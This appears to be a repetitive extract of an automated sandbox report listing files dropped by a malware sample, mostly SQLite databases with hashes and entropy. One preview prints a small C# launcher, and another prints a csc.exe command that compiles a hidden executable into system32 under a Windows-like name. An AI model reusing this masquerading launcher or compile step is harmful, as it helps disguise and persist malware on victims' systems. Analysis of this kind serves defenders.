                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):376
                                                                                                            Entropy (8bit):4.89320327744359
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:V/DBXVgtSaIb2Lnf+eG6L2F0T7bfwlxFK8wM2Lnf+eG6L29JZxv3iFK8wQAv:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBLKz
                                                                                                            MD5:4E2E79ACE6C99F645E8D04C7BA820C12
                                                                                                            SHA1:849BF64D1685BEDBD63BF381A8C5063C692A6CB3
                                                                                                            SHA-256:06995A46EBDA846CDBDE4431495541FC3B57CA03A70C5B528777BFBC45B150DD
                                                                                                            SHA-512:A23BE91AD5805D29BDF310723F1801CD43678CF68586FDCA508DF6BAE2473B59B71B65C45F93777667D99ED18931B3293C16731302AF41450DDC2C2971701709
                                                                                                            Malicious:false
                                                                                                            Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Recovery\RuntimeBroker.exe"); } catch { } }).Start();. }.}.
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):250
                                                                                                            Entropy (8bit):5.125992733475265
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8owkn23f+WfU2P:Hu7L//TRq79cQWf2sLP
                                                                                                            MD5:2E1C2C05E117B7655C850B177B1ED81E
                                                                                                            SHA1:A3FBBE831F8E6DF4A39EFF18C32A2C94359F4582
                                                                                                            SHA-256:3D753ED873DB7DBFE5DE9134FB4F4676994D9A80C4EFEC606AB5E1842FB0A737
                                                                                                            SHA-512:E9BC328929267C69555C234E16C7175E9F5E62D3E9E2E31CBE885C9761CBE03EDDEC4C2D56B3F238C957FD782CE53E435BB1ABCA4D819408B82FE6F04F6851E6
                                                                                                            Malicious:true
                                                                                                            Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.0.cs"
                                                                                                            Process:C:\Users\user\Desktop\s5duotgoYD.exe
                                                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (329), with CRLF, CR line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):750
                                                                                                            Entropy (8bit):5.267454687977641
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:KJN/I/u7L//TRq79cQWf2sL2KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KJBI/un/Vq79tWf2XKax5DqBVKVrdFAw
                                                                                                            MD5:C986AC6EEADACC1C8CB681B051A77949
                                                                                                            SHA1:CEBA857B2ED972BC19133591E0AAD5A245AA3CBE
                                                                                                            SHA-256:628EF19212C5287B800261960044C06EDEEFA93F8EA175C122709AA5730B1C06
                                                                                                            SHA-512:FA363E49CE7005A7ABDBA452B928F1131CF5E5887E64149A766D596DAF0F8F08B0B3E8F7ECBA97A10DB2C379D711CEE3C816CDC3F846AE65E2A1A124EB7A40FC
                                                                                                            Malicious:false
                                                                                                            Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\ozb03vs1\ozb03vs1.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.5793180405395284
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                            MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                            SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                            SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                            SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                            Category:dropped
                                                                                                            Size (bytes):114688
                                                                                                            Entropy (8bit):0.9746603542602881
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                            MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                            SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                            SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                            SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):98304
                                                                                                            Entropy (8bit):0.08235737944063153
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                            MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                            SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                            SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                            SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5707520969659783
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                                            SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                                            SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                                            SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):20480
                                                                                                            Entropy (8bit):0.5712781801655107
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                                            MD5:05A60B4620923FD5D53B9204391452AF
                                                                                                            SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                                                                                            SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                                                                                            SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                            SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                            SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                            Category:dropped
                                                                                                            Size (bytes):106496
                                                                                                            Entropy (8bit):1.1358696453229276
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                            MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                            SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                            SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                            SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):49152
                                                                                                            Entropy (8bit):0.8180424350137764
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                            MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                            SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                            SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                            SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                            Malicious:false
                                                                                                            Process:C:\Recovery\RuntimeBroker.exe
                                                                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                            Category:dropped
                                                                                                            Size (bytes):40960
                                                                                                            Entropy (8bit):0.8553638852307782
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                            MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                            SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
